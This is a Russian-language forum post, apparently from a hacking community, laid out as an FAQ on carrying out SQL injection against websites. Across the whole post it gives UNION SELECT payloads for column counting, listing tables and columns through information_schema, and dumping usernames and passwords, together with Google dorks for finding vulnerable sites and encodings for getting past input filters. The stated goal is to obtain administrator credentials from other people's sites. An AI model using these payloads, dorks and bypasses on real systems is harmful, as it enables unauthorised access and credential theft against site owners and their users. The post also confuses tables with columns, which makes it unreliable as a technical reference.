[ Войти · Правила форума · Поиск · RSS ]

  • Страница 1 из 1
  • 1
SQL - INJECTION FAQ
AnymousДата: Вторник, 14.01.2014, 21:06 | Сообщение # 1
.::Создатель::.
Сообщений: 863
Репутация: 53 ±
Награды: 24 +
В последнее время зачастились вопросы ко мне в ICQ - как провести SQL - Injection. Какие команды, почему неполучается... И я решил сделать FAQ... который будет дополнятся постоянно...

1. Q. КАК НАЙТИ SQL INJECTION
A. В конце параметра ID или PID поставить одинарную кавычку... Увидите ошибку типо
Код
Microsoft OLE DB Provider for SQL Server error '80040e14'  

Unclosed quotation mark before the character string ''.  

/Program_Areas/project.asp, line 146

или
Код
[Microsoft][ODBC Microsoft Access Driver]

или
Код
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.lionheart/ecodelaware/ecodelaware.com/place.php on line 107

Это скорее всего SQL - injecton зависит от СУБД...

2. Q. Как определить количество таблиц???
A. Для этого после цифры которая следует после ID ввести команду
Код
order+by+10/*

Если вылазиет ошибка таблиц меньше 10 если все нормально то больше... Увеличивать по 1 до появления ошибки... Это и будет точное кол во таблиц...

3. Q. Я нашол точное количество таблиц и ХЗ чеделать дальше...
А. Дальше выводим рабочую цифру (тоблицу), предположем таблиц 5, делаем запрос
Код
+union+select+1,2,3,4,5/*

мы увидим цыфру с которой будем работать...

4. Q. Как определить версию СУБД?
А. Команда
Код
version(),database(),user()

5. Q.У меня mysql 4 версии немогу вывести названия таблиц???
A. Ты их и невывидиш потомучто функция information_schema.tables отключенна...
Перебирай в слепую...

6. Q. А как посмотреть название всех таблиц???
А. В 5 ветки командой
Код
information_schema.tables

пример +union+select+1,table_name,3,4,5+from+information_schema.tables/*

7. Q. А как узнать названия столбцов???
А. Так же как и таблиц заменяем на Column_name и information_schema.columns

8. Q. Я узнал таблицу USERS и столбцы login и password как мне вывести результат???
A. Командой
Код
union+select+1,concat(login,0x3a,password),3,4,5--

9. Q. Я узнал пароль и имя администратора, а где админка???
A. Ебу я чтоли где админки, я сайт делал чтоли!!!

10. Q. А где можно посмотреть видеомануалы по этой теме???
А. Вот ТУТ

11. Q. Я узнал количество таблиц на когда ввожу UNION+SELECT ничего непроисходит или вылазиет ошибка..??
А. Это потому что это функция отключенна - это blind SQL - injection

12. Q. А как мне отыскать SQL СУБД при помощи google??
А ТАКИЕ ЗАПРОСЫ
Код
inurl:".php?id="

- в основном mySQL ,
Код
inurl:".asp?id="

- mssql

13. Q. А как мне обойти фильтрацию переменных???
А. В конце вместо ' можно ставить ",`,%27,%2527
Вместо /* можно --,{,%23
Вместо + можно /**/,%09,%0a,%0d,%2b

14. Q. Почему при команде group_concat не все таблицы или столбцы выводятся на экран??
А. Потомучто скорее всего стоит ограничение на вывод символов, перебираем через +Limit+1,1
15. Q. Чем отличается mssql от mysql?
А. MSSQL вертится на винде, а mySQL на чем угодно...
__________________

Автор: t0xA hacker-pro.net

Как создать скриншот? | Как создать лог файл HijackThis?
Причины, по которым может тормозить компьютер | Правила сайта!
 
  • Страница 1 из 1
  • 1
Поиск:


Чтобы добавить сообщение или создать новую тему, необходимо зарегистрироваться или зайти под своим ником!
вверх
Файлы для обмена предоставлены пользователями сайта. Администрация не несёт ответственности за их содержание. На сервере хранятся только торрент-файлы. Это значит, что мы не храним никаких нелегальных материалов, а так же материалов охраняемых авторским правом.
RudSOFT © 2010 - 2024 | Карта сайта | Карта форума | Хостинг от uCoz Cвязь с Администрацией | Информация для правообладателей